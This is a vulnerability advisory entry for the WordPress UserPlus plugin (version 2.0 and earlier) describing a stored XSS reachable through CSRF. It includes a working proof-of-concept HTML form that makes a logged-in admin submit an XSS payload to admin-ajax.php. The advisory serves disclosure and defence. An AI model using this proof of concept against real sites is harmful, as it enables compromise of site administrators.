WordPress Plugin Vulnerabilities
UserPlus <= 2.0 - Stored XSS via CSRF
Description
The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.
Proof of Concept
Open the .html file where the admin user is logged in ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://172.28.128.6/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="title" value="Username" /> <input type="hidden" name="label" value="Username1" /> <input type="hidden" name="meta_key" value="user_login" /> <input type="hidden" name="placeholder" value="username1" /> <input type="hidden" name="help_text" value="asdf" onfocus="alert(123)" autofocus="" /> <input type="hidden" name="privacy" value="1" /> <input type="hidden" name="default_value" value="my-val" /> <input type="hidden" name="is_required" value="1" /> <input type="hidden" name="user_edit" value="0" /> <input type="hidden" name="icon" value="fa-user" /> <input type="hidden" name="min_length" value="3" /> <input type="hidden" name="max_length" value="30" /> <input type="hidden" name="type" value="text" /> <input type="hidden" name="action" value="userplus_admin_update_field" /> <input type="hidden" name="arg2" value="10" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` - Go to http://172.28.128.6/wordpress/wp-admin/post.php?post=10&action=edit - Click on the edit button present on `UserName` row. PFA screenshot - Click on help text and xss will be triggered
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Shreya Pohekar
Submitter
Shreya Pohekar
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2023-04-12 (about 1 years ago)
Added
2023-04-12 (about 1 years ago)
Last Updated
2023-04-12 (about 1 years ago)